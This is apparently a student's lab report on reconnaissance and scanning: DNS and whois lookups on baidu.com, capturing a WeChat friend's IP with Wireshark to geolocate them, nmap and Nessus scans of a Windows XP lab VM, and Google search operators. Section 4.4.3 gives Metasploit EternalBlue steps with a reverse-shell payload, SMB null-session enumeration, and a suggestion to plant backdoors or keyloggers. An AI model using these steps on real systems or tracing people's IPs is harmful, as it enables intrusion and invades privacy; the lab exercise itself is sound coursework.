20232423 2025-2026-1 《网络与系统攻防技术》实验五实验报告

一、实验内容

(1)从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取如下信息:
DNS注册人及联系方式、该域名对应IP地址、IP地址注册人及联系方式、IP地址所在国家、城市和具体地理位置
PS:使用whois、dig、nslookup、traceroute、以及各类在线和离线工具进行搜集信息(要求必须用WHOIS、dig、nslookup、traceroute、tracert以及在线工具)
(2)尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置。
(3)使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。
靶机IP地址是否活跃、靶机开放了哪些TCP和UDP端口、靶机安装了什么操作系统、版本是多少、靶机上安装了哪些服务
(4)使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。
靶机上开放了哪些端口、靶机各个端口上网络服务存在哪些安全漏洞、你认为如何攻陷靶机环境,以获得系统访问权
(5)①通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题。
②并练习使用Google hack搜集技能完成搜索(至少10种搜索方法)


二、实验目的

学习使用搜索引擎、扫描引擎、扫描工具分析目标状态。实现对目标信息的全面了解


三、实验环境

虚拟机VMware中Kali的linux环境和虚拟机VMware中WinXP环境,WinXP配置如下:(教程https://blog.csdn.net/weixin_52799373/article/details/144051549)
image


四、实验过程

4.1查询baidu.com的DNS域名

4.1.1查询DNS注册人及联系方式

  在kali虚拟机中使用命令whois baidu.com,查询该域名的相关信息,如下图
image
image
  从上图中可以看到注册人信息,注册商信息,联系方式等信息,具体信息如下
  注册域名ID:11181110_DOMAIN_COM-VRSN
  注册商(Registrar):MarkMonitor Information Technology (Shanghai) Co., Ltd.
  注册商IANA ID:3838
  注册商滥用投诉电话(Registrar Abuse Contact Email):+1.2083895740
  注册商滥用投诉邮箱(Registrar Abuse Contact Phone):abusecomplaints@markmonitor.com
  注册人组织(Registrant Organization):北京百度网讯科技有限公司。
  注册人国家(Registrant Country):CN(中国)。
  若需要获取注册人邮箱(Registrant Email)和技术邮箱(Tech Email),需通过指定链接(https://domains.markmonitor.com/whois/baidu.com)的表单申请。

4.1.2查询该域名对应IP地址

  使用命令dig baidu.com查询DNS解析信息,可查询所用的DNS服务器、返回的IP地址、TTL及查询耗时等信息,如下图:
image

  从返回数据可以知道,状态(status)为NOERROR,表示查询成功,没有错误。这条dig命令成功获取了baidu.com的4个IPv4解析地址(111.63.65.33、110.242.74.102、111.63.65.240、124.237.177.164)。
  接着使用命令nslookup baidu.com查询域名的DNS信息,如下图
image

  从返回数据可以知道,使用的DNS服务器是8.8.8.8(谷歌公共DNS服务器),端口为53。baidu.com解析到4个IPv4地址,分别是:、124.237.177.164、111.63.65.33、110.242.74.102、111.63.65.240。这些地址与之前dig命令查询的结果一致,体现了百度域名的多IP负载均衡配置,用于提升服务可用性和访问速度。

4.1.3查询IP地址注册人及联系方式

  随机选择上面获取到的4个IP地址中的一个进行查询,这里选择111.63.65.240。输入命令whois 111.63.65.240,可以得到IP地址的注册人和他的邮箱、电话以及IP地址的地址信息等内容,如下图。
image
  从返回数据可以知道
  IP地址段(inetnum): 111.0.0.0 - 111.63.255.255
  网络名称(netname): CMNET
  所属机构(descr): China Mobile Communications Corporation ,中国移动通信集团公司
image
  从上图返回数据可以知道
  角色(role):chinamobile tech,是中国移动的技术相关角色
  地址(address):北京市西城区金融大街29号,位于中国(CN)
  电话(phone):+86 5268 6688
  传真(fax-no):+86 5261 6187
  邮箱(e-mail):hostmaster@chinamobile.com
  滥用投诉邮箱(abuse-mailbox):abuse@chinamobile.com
image
  从上图返回数据可以知道
  姓名(person):haijun li
  邮箱(e-mail):hostmaster@chinamobile.com
  地址(address):北京市西城区金融大街29号,邮编 100032
  电话(phone):+86 1052686688
  传真(fax-no):+86 1052616187
  国家(country):中国
  滥用投诉邮箱(abuse-mailbox):abuse@chinamobile.com

4.1.4查询IP地址所在国家、城市和具体地理位置

  输入命令traceroute baidu.com,如下图
image
  从上图返回数据可以知道,得到两个不一样的百度网站的IP地址,分别是:124.237.177.164、111.63.65.33。
  两者从第2跳开始出现大量* * *,表示这些路由节点未对traceroute的探测包做出响应。原因可能有:
  ①节点开启了ICMP限制(出于安全或策略原因,拒绝回应traceroute类探测);
  ②网络路径中存在防火墙、负载均衡设备等,屏蔽了探测流量;
  ③部分中间节点本身不支持或不响应traceroute协议。


  然后使用“UU在线工具”(https://uutool.cn/ip/)查询上面得到的两个IP地址的具体位置,如下图
image
image

4.2 获取好友IP地址,并查询地理位置

4.2.1获取IP地址

  给某一微信好友打语音电话并开启wireshark抓包,使用命令udp and ip.addr==192.168.3.21筛选IP为主机地址,并且传输协议为UDP的数据包,如下图:
image

  从中可以看到,与192.168.3.21通信的地址是116.163.21.17

4.2.1查询IP地址

  通过刚才的网站对该ip地址进行位置查找,如下图,其实差得有点远啊,我好友在贵州,但是捕获到的ip地址却是在湖南长沙(试了很多次都是这样)
image

4.3 用nmap开源软件对靶机环境进行扫描

  此处使用WinXP虚拟机作为靶机,Kali虚拟机作为攻击机。配置该靶机可以参考教程:https://blog.csdn.net/weixin_52799373/article/details/144051549
  安装完成后,分别查看靶机与攻击机的IP地址,如下图,靶机IP地址为192.168.209.149,攻击机的IP地址为192.168.209.128。
image
image

  在进行nmap扫描之前,要先关闭WinXP的防火墙(不然扫描出来的端口都是关闭的)

4.3.1查看靶机IP地址是否活跃

  通过命令nmap -sn 192.168.209.149进行ping扫描,查询靶机是否在线。如下图,目标主机192.168.209.149处于开机状态(Host is up),说明靶机IP活跃。
image

4.3.2查看靶机开放了的TCP和UDP端口

  通过命令nmap -sS 192.168.209.149进行SYN半开扫描,查询靶机开放的TCP端口,如下图
image

  共扫描了1000个TCP端口,其中997个端口处于关闭状态(closed tcp ports)并返回RST响应,另有3个端口处于开放状态:
  135端口:主要用于使用RPC协议并提供DCOM服务
  139端口:主要用于NetBIOS会话服务,用于Windows文件共享等功能
  445端口:主要用于Microsoft目录服务,支持SMB协议的文件和打印机共享


  通过命令nmap -sU 192.168.209.149进行UDP扫描,查询靶机开放的UDP端口,如下图
image

  共扫描了1000个UDP端口,其中993个端口处于关闭状态(closed udp ports)并返回port-unreach(端口不可达)响应,另有7个端口处于open或open|filtered状态:
  123端口:运行网络时间协议,用于系统时间同步
  137端口:运行NetBIOS名称服务,用于Windows网络的名称解析
  138端口:运行NetBIOS数据报服务,支持Windows网络的广播通信
  445端口:运行微软目录服务,支持SMB协议的文件和打印机共享
  500端口:运行互联网安全关联和密钥管理协议,用于VPN等加密通信的密钥协商
  1900端口:运行upnp服务,通用即插即用,用于设备发现和网络服务配置
  4500端口:运行IPsec NAT穿越的IKE协议,用于VPN在NAT环境下的通信

4.3.3查看靶机安装的操作系统,

  通过命令nmap -O 192.168.209.149,查询靶机安装的操作系统及版本,如下图:
image

  可以看到,设备类型为通用设备(general purpose),运行的系统是Microsoft Windows XP,具体版本为SP2或SP3。

4.3.4查看靶机安装的服务

  通过命令nmap -sV 192.168.209.149,查询靶机安装的服务,如下图:
image

  可以看到,安装的服务有:
  135端口:Microsoft Windows RPC(远程过程调用)服务,用于Windows系统中组件间的远程通信与服务调用。
  139端口:Microsoft Windows NetBIOS会话服务,支持Windows网络中的文件共享、名称解析等功能。
  445端口:Microsoft Windows XP下的微软目录服务,基于SMB协议,提供文件和打印机共享等服务。

4.4 用Nessus开源软件对靶机环境进行扫描

在Kali虚拟机上下载nessus,下载教程参考网址:https://blog.csdn.net/weixin_48886225/article/details/140269127。

4.4.1 靶机上开放的端口

  通过https://localhost:8834打开nessus,选择create new scan,选择其中的host discovery。在扫描配置界面,输入任务名称、描述、文件夹与目标主机。前三个可以任意填写,随后一个需填写靶机的IP地址,如下图
image

  保存并进行扫描,扫描结果如下图,可以看到靶机开放了135、139、445端口,与用nmap扫描的结果相同
image

4.4.2 靶机各个端口上网络服务存在的安全漏洞

  创建一个新的扫描,选择Advanced Scan高级扫描,并使用同样的方式进行配置,保存并进行扫描,扫描结果如下图所示
image

  从图中可以看到,出现了Critical(严重)、High(高)、Medium(中)、Low(低)四类风险等级,还有Info信息类。
  Microsoft Windows XP Unsupported Installation Detection(严重),这是最严重的漏洞,因为Windows XP早已停止官方支持,不再获得安全补丁,意味着系统将持续暴露在已知和未知的安全威胁中,被攻击的风险极高。
  SMB NULL Session Authentication(高),SMB空会话认证漏洞允许攻击者在未授权的情况下获取系统信息,甚至进一步渗透,EPSS(漏洞可利用性评分系统)为0.0866,说明有一定的实际利用概率。
  ICMP Timestamp Request Remote Date Disclosure(低),该漏洞通过ICMP时间戳请求可远程获取系统日期信息,虽风险较低,但可能为攻击者提供系统指纹信息,辅助后续攻击。
  各类Multiple Issues(中等),这类聚合型漏洞说明Windows系统和SMB协议存在多处安全问题,需逐一排查修复。
  信息性漏洞(如Nessus SYN scanner),主要是用于识别扫描工具、系统平台枚举等信息,虽无直接危害,但会为攻击者提供系统轮廓,间接增加风险。

4.4.3 攻陷靶机环境,以获得系统访问权​

  结合靶机Win XP系统的漏洞特征(未受官方支持、SMB 空会话漏洞、ICMP 时间戳泄露等),可采用信息枚举、漏洞利用、权限获取等方式进行攻击,具体攻击方式如下:​
(1)SMB协议漏洞利用​

  • 原理:
      靶机存在“SMB NULL Session Authentication”高风险漏洞,允许攻击者在未提供用户名密码的情况下建立匿名空会话,获取系统敏感信息后进一步渗透。​
  • 工具与步骤:​
      ①信息枚举:使用enum4linux -a 192.168.209.149一键扫描,获取靶机主机名、用户列表、共享文件夹、密码策略等信息;或通过rpcclient -U "" -N 192.168.209.149执行enumdomusers命令枚举系统用户,getdompwinfo查询密码复杂度策略。​
      ②远程代码执行:利用WinXP未修复的SMBv1协议漏洞(如MS17-010 “永恒之蓝”),通过Metasploit框架发起攻击。启动msfconsole后,加载模块use exploit/windows/smb/ms17_010_eternalblue,设置靶机IPset RHOSTS 192.168.209.149、攻击机 IPset LHOST 本地IP,选择反弹shell载荷windows/x64/meterpreter/reverse_tcp,执行exploit即可获取SYSTEM权限的Meterpreter会话。​
      ③共享资源访问:通过smbclient -L //192.168.209.149 -N列出匿名可访问的共享文件夹,若存在可写权限的共享目录,可上传恶意脚本(如后门程序、键盘记录器)实现持久化控制。​​
    (2)ICMP 信息辅助攻击​
  • 原理:
      靶机存在 “ICMP Timestamp Request Remote Date Disclosure” 漏洞,可通过时间戳响应辅助攻击者完成系统指纹识别与攻击时机判断。
  • 工具与步骤:
      使用nmap -p 0-65535 -sP -PE 192.168.209.149发送ICMP时间戳请求,分析响应包中的时间字段确认系统当前时间,结合漏洞利用工具的时间依赖特性(如某些EXP需精准控制内存布局)优化攻击参数;同时通过时间戳响应模式辅助验证操作系统版本,确认靶机为WinXP而非其他仿冒系统。​

4.5搜索测试

4.5.1在网上搜索自己的足迹

  在网页上搜索自己的名字,发现出现的都不是我,可能是小张太“默默无闻”了。
image
image

  但是如果搜索学号的话,虽然我的博客在整个页面比较靠中,但还是能把我搜出来
image
image

  可以看到我的信息在网上暴露得并不多,能显示出来的也都无伤大雅。

4.5.2练习使用Google hack搜集技能完成搜索

(1)site:限制搜索结果为特定网站或域名
  site:cnblogs.com nessus安装,搜索博客园中含“nessus安装”的内容
image

(2)intitle:用于搜索网页标题中包含特定关键词的网页。
  intitle:洋芋粑,搜索网页标题中包含“洋芋粑”的网页.其实这个跟直接搜索也差不多了。
image

(3)inurl:搜索URL中包含特定关键词的页面。
  inurl:login,会搜索所有URL中包含login关键词的网页,即定位登录页面
image

(4)filetype:搜索特定文件类型的文件。
  filetype:pdf 学习,搜索所有包含学习关键词的PDF文件。
image

(5)intext:搜索网页正文中包含特定关键词的网页。
  intext:辣子鸡,搜索网页正文中包含辣子鸡的网页
image

(6):通配符匹配任何未知词,在词组中代替一个或多个未知词。。
  
的美食,可查找出各种美食信息
image

(7)allintitle:查找标题中同时包含多个关键词的页面
  allintitle:贵州 美食,查找标题中同时包含“贵州”和“美食”的页面
image

(8)OR:A OR B,系统查找含有检索词A、B之一,或同时包括检索词A和检索词B的信息。
  黑客 or 电影,查找含有检索词黑客或者电影的信息
image

(9)NOT:A NOT B,查找A相关内容,且A中没有B。
  留学NOT英国,查找除英国外的其他留学信息
image

(10)info:指定域名,查询网站的基础信息,如缓存时间、收录状态等。
  info:google.com。可用于展示谷歌官网的基本索引信息
image


五、问题及解决

  无


六、学习感悟

  本次实验,应该是目前做过来的几个最简单的一个了。
  本次实验让我对网络信息搜集、漏洞扫描与渗透测试有了更系统、更深入的理解。通过实际操作,我不仅掌握了多种工具的使用方法,还进一步认识到信息收集在网络安全攻防中的重要性。
  在DNS信息查询环节,我学会了使用whois、dig、nslookup、traceroute等命令,结合在线工具,全面获取目标域名的注册信息、IP地址、地理位置等关键数据。这让我意识到,即使是公开信息,也可能成为攻击者进行社会工程学攻击或网络测绘的入口。
  在获取好友IP并定位的过程中,我体会到网络通信中隐私泄露的潜在风险。通过Wireshark抓包分析,我直观地看到了实时通信中的IP暴露问题(其实有一种开别人户的爽感)
  在nmap和Nessus扫描部分,我学会了如何探测目标主机的活跃状态、开放端口、操作系统及服务版本,还初步掌握了漏洞分析与风险评估的方法。
  在Google Hacking部分,我学习到了了多种搜索语法,能够更精准地查询到我想要的内容。
  总的来说,收获很多。

Posted on 2025-11-16 19:59  20232423  阅读(12)  评论(0)    收藏  举报